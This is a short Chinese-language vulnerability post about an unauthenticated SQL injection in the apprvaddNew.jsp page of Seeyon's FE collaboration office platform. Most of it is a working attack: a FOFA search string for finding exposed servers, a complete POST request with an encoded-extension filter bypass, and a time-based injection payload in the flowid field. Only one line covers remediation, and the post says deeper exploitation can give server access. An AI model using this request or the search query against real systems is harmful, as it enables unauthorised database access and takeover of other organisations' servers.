致远互联FE协作办公平台 apprvaddNew.jsp SQL注入漏洞

免责声明：本号提供的网络安全信息仅供参考，不构成专业建议。作者不对任何由于使用本文信息而导致的直接或间接损害承担责任。如涉及侵权，请及时与我联系，我将尽快处理并删除相关内容。

漏洞描述

致远互联FE协作办公平台apprvaddNew.jsp存在SQL注入漏洞,未经身份验证的攻击者可以通过此漏洞获取数据库敏感信息，深入利用可获取服务器权限。

漏洞再现

FOFA：body="li_plugins_download"

 POST /witapprovemanage/apprvaddNew.j%73p HTTP/1.1

Host: x.x.x.x

User-Agent:Mozilla/5.0 (WindowsNT10.0;Win64; x64) AppleWebKit/537.36 (KHTML, likeGecko)Chrome/96.0.4664.93Safari/537.36

Content-Type:application/x-www-form-urlencoded 

flowid=1';WAITFOR+DELAY+'0:0:5'--

 延时5秒的效果

 漏洞修复

关闭互联网暴露面或接口设置访问权限，升级至安全版本。